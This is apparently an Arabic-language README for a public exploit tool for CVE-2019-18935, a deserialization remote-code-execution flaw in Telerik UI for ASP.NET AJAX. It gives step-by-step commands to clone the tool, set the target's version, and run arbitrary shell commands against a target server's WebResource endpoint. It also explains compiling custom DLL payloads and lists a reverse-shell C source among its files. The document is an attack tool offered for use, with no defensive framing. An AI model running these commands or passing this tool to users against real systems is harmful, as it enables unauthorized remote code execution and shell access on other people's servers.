
استغلال لـ CVE-2019-18935
استغلال تنفيذ الأكواد عن بُعد لتطبيق Telerik UI ASP.NET AJAX من خلال ثغرة إلغاء التسلسل.
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
CVE-2019-18935.py، عدّل السطر 15:version = "2017.1.228" # Replace with target server's Telerik version
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"
🔧 بناء ملفات DLL مخصصة
لإنشاء ملف DLL من ملف C مختلف (وليس مجرد شل عكسي):
قم بتثبيت Visual Studio (تطوير سطح المكتب باستخدام c++) مع هذه المكوّنات:
قم ببناء ملف DLL:
build-dll.bat your_file.c
سيتم إنشاء ملف DLL في مجلد payloads/.
📋 وصف الملفات
CVE-2019-18935_exploit/
├── CVE-2019-18935.py # Main exploit code
├── RAU_crypto.py # Telerik encryption/decryption module
├── build-dll.bat # Script to build DLL files from C code
├── reverse_shell.c # C source code for reverse shell
└── payloads/ # Directory for Compiled DLL payload files